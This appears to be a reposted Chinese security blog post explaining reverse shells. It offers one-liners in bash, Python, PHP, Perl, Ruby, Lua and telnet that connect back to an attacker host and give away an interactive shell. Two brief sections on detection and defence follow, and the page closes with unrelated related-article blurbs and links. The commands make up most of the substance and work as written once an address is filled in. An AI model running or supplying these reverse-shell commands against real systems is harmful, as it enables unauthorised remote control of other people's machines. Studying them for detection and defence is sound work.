2022-11-10 958 發(fā)布于山東

版權(quán)

舉報(bào)

版權(quán)聲明：

本文內(nèi)容由阿里云實(shí)名注冊(cè)用戶自發(fā)貢獻(xiàn)，版權(quán)歸原作者所有，阿里云開(kāi)發(fā)者社區(qū)不擁有其著作權(quán)，亦不承擔(dān)相應(yīng)法律責(zé)任。具體規(guī)則請(qǐng)查看《 阿里云開(kāi)發(fā)者社區(qū)用戶服務(wù)協(xié)議》和 《阿里云開(kāi)發(fā)者社區(qū)知識(shí)產(chǎn)權(quán)保護(hù)指引》。如果您發(fā)現(xiàn)本社區(qū)中有涉嫌抄襲的內(nèi)容，填寫(xiě) 侵權(quán)投訴表單進(jìn)行舉報(bào)，一經(jīng)查實(shí)，本社區(qū)將立刻刪除涉嫌侵權(quán)內(nèi)容。

簡(jiǎn)介： 網(wǎng)絡(luò)安全-反彈shell詳解（攻擊，檢測(cè)與防御）

簡(jiǎn)介

如果我們需要到服務(wù)器上執(zhí)行 Shell 命令，但是因?yàn)榉阑饓Φ仍?，無(wú)法由客戶端主動(dòng)發(fā)起連接的情況，就可以使用反彈 Shell 來(lái)滿足登陸和操作的需求。

原理

操作受害者機(jī)器，將某開(kāi)放端口的數(shù)據(jù)發(fā)送到可執(zhí)行命令的程序上，將結(jié)果返回給攻擊機(jī)。攻擊機(jī)發(fā)送向受害者開(kāi)放端口發(fā)送命令，接收命令執(zhí)行結(jié)果。

反彈shell

bash

bash -i >& /dev/tcp/ip/port 0>&1

0：標(biāo)準(zhǔn)輸入；1：標(biāo)準(zhǔn)輸出；2：標(biāo)準(zhǔn)錯(cuò)誤。

bash -i：產(chǎn)生一個(gè)交互式環(huán)境

>&：將標(biāo)準(zhǔn)輸出和標(biāo)準(zhǔn)錯(cuò)誤結(jié)合，一起重定向給后者

/dev/tcp/ip/port：建立一個(gè)tcp連接

0>&1：將標(biāo)準(zhǔn)輸入重定向到標(biāo)準(zhǔn)輸出

nc

Linux命令-nc（端口監(jiān)控、文件傳輸、反彈shell等）_lady_killer9的博客-CSDN博客

python

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

python -c command

將字符串當(dāng)做python代碼執(zhí)行

同理，上面也是利用bash進(jìn)行的反彈

php

php -r 'exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")'

perl

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

ruby

ruby -rsocket -e'f=TCPSocket.open("接收端ip",端口).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

telnet

mknod a p; telnet 接收端IP 端口 0<a | /bin/bash 1>a

Windows平臺(tái)，可以使用powercat   reverseudpshell   icmpsh

檢測(cè)

及時(shí)發(fā)現(xiàn)Bash進(jìn)程啟動(dòng)事件

檢查Bash進(jìn)程是否打開(kāi)了終端設(shè)備，是否有主動(dòng)對(duì)外連接

防御

防火墻限制

Netlink監(jiān)聽(tīng)，kill進(jìn)程（詳見(jiàn)騰訊云參考）

參考

基于主機(jī)的反彈shell檢測(cè)思路 - 嗶哩嗶哩

常用的反彈shell總結(jié)_西部壯仔的博客-CSDN博客_反彈shell能干嘛

自動(dòng)化反彈Shell防御技術(shù) - 云+社區(qū) - 騰訊云

相關(guān)文章

網(wǎng)絡(luò)安全之盾：漏洞防御與加密技術(shù)解析

在數(shù)字時(shí)代的浪潮中，網(wǎng)絡(luò)安全和信息安全成為維護(hù)個(gè)人隱私和企業(yè)資產(chǎn)的重要防線。本文將深入探討網(wǎng)絡(luò)安全的薄弱環(huán)節(jié)—漏洞，并分析如何通過(guò)加密技術(shù)來(lái)加固這道防線。文章還將分享提升安全意識(shí)的重要性，以預(yù)防潛在的網(wǎng)絡(luò)威脅，確保數(shù)據(jù)的安全與隱私。

網(wǎng)絡(luò)安全的盾牌與劍：漏洞防御與加密技術(shù)深度解析

在數(shù)字信息的海洋中，網(wǎng)絡(luò)安全是航行者不可或缺的指南針。本文將深入探討網(wǎng)絡(luò)安全的兩大支柱——漏洞防御和加密技術(shù)，揭示它們?nèi)绾喂餐瑯?gòu)筑起信息時(shí)代的安全屏障。從最新的網(wǎng)絡(luò)攻擊手段到防御策略，再到加密技術(shù)的奧秘，我們將一起揭開(kāi)網(wǎng)絡(luò)安全的神秘面紗，理解其背后的科學(xué)原理，并掌握保護(hù)個(gè)人和企業(yè)數(shù)據(jù)的關(guān)鍵技能。

網(wǎng)絡(luò)安全漏洞與防御策略：深入加密技術(shù)和安全意識(shí)的培養(yǎng)

在數(shù)字化時(shí)代，網(wǎng)絡(luò)安全的重要性日益凸顯。本文將深入探討網(wǎng)絡(luò)安全的多個(gè)維度，包括常見(jiàn)的網(wǎng)絡(luò)漏洞類(lèi)型、加密技術(shù)的應(yīng)用以及如何培養(yǎng)強(qiáng)大的網(wǎng)絡(luò)安全意識(shí)。通過(guò)分析這些關(guān)鍵要素，讀者將獲得保護(hù)個(gè)人和組織數(shù)據(jù)免受威脅所需的知識(shí)。

網(wǎng)絡(luò)安全的隱形盾牌：漏洞防御與加密技術(shù)

在數(shù)字化時(shí)代，網(wǎng)絡(luò)安全成為保護(hù)個(gè)人隱私和公司資產(chǎn)不可或缺的一部分。本文將探討網(wǎng)絡(luò)安全中的常見(jiàn)漏洞、加密技術(shù)的重要性以及提升安全意識(shí)的必要性。通過(guò)分析不同類(lèi)型的網(wǎng)絡(luò)攻擊案例，我們將了解如何識(shí)別和應(yīng)對(duì)這些威脅。同時(shí)，文章還將介紹基礎(chǔ)的加密技術(shù)概念，并通過(guò)代碼示例展示如何在實(shí)際中應(yīng)用這些技術(shù)來(lái)保護(hù)數(shù)據(jù)。最后，討論為何提高個(gè)人和組織的安全意識(shí)是防范網(wǎng)絡(luò)威脅的關(guān)鍵。

網(wǎng)絡(luò)安全的盾牌與利劍：漏洞防御與加密技術(shù)的深度剖析

在數(shù)字化時(shí)代的浪潮中，網(wǎng)絡(luò)信息安全成為維護(hù)個(gè)人隱私和組織資產(chǎn)的關(guān)鍵防線。本文將深入探討網(wǎng)絡(luò)安全的核心議題，包括常見(jiàn)的安全漏洞、先進(jìn)的加密技術(shù)以及提升整體網(wǎng)絡(luò)安全意識(shí)的重要性。通過(guò)分析最新的攻擊手段和防御策略，旨在為讀者提供一個(gè)關(guān)于如何構(gòu)建更安全網(wǎng)絡(luò)環(huán)境的實(shí)戰(zhàn)指南。

網(wǎng)絡(luò)安全與信息安全：知識(shí)分享####

【10月更文挑戰(zhàn)第21天】 隨著數(shù)字化時(shí)代的快速發(fā)展，網(wǎng)絡(luò)安全和信息安全已成為個(gè)人和企業(yè)不可忽視的關(guān)鍵問(wèn)題。本文將探討網(wǎng)絡(luò)安全漏洞、加密技術(shù)以及安全意識(shí)的重要性，并提供一些實(shí)用的建議，幫助讀者提高自身的網(wǎng)絡(luò)安全防護(hù)能力。 ####

云計(jì)算與網(wǎng)絡(luò)安全：云服務(wù)、網(wǎng)絡(luò)安全、信息安全等技術(shù)領(lǐng)域的融合與挑戰(zhàn)

本文將探討云計(jì)算與網(wǎng)絡(luò)安全之間的關(guān)系，以及它們?cè)谠品?wù)、網(wǎng)絡(luò)安全和信息安全等技術(shù)領(lǐng)域中的融合與挑戰(zhàn)。我們將分析云計(jì)算的優(yōu)勢(shì)和風(fēng)險(xiǎn)，以及如何通過(guò)網(wǎng)絡(luò)安全措施來(lái)保護(hù)數(shù)據(jù)和應(yīng)用程序。我們還將討論如何確保云服務(wù)的可用性和可靠性，以及如何處理網(wǎng)絡(luò)攻擊和數(shù)據(jù)泄露等問(wèn)題。最后，我們將提供一些關(guān)于如何在云計(jì)算環(huán)境中實(shí)現(xiàn)網(wǎng)絡(luò)安全的建議和最佳實(shí)踐。

相關(guān)知識(shí)

醫(yī)療器械網(wǎng)絡(luò)安全
醫(yī)療保健網(wǎng)絡(luò)安全綜合指南
醫(yī)療保健網(wǎng)絡(luò)安全解決方案
中班沉迷網(wǎng)絡(luò)安全活動(dòng)教案反思
網(wǎng)絡(luò)
臨汾假期健康安全教育網(wǎng)絡(luò)課堂即將開(kāi)講
你的健康信息安全嗎？了解衛(wèi)生健康行業(yè)網(wǎng)絡(luò)安全培訓(xùn)的重要性
護(hù)童網(wǎng)絡(luò)安全知識(shí)，為孩子筑起數(shù)字世界的保護(hù)墻
ANSI UL醫(yī)療器械網(wǎng)絡(luò)安全標(biāo)準(zhǔn)受到美國(guó)FDA官方認(rèn)可。
“守護(hù)未來(lái) 安全上網(wǎng)”未成年人網(wǎng)絡(luò)保護(hù)系列課程：網(wǎng)絡(luò)新手變達(dá)人——培養(yǎng)健康的網(wǎng)絡(luò)使用習(xí)慣專題公益講座開(kāi)始招募啦!

網(wǎng)址: 網(wǎng)絡(luò)安全 http://www.u1s5d6.cn/newsview834537.html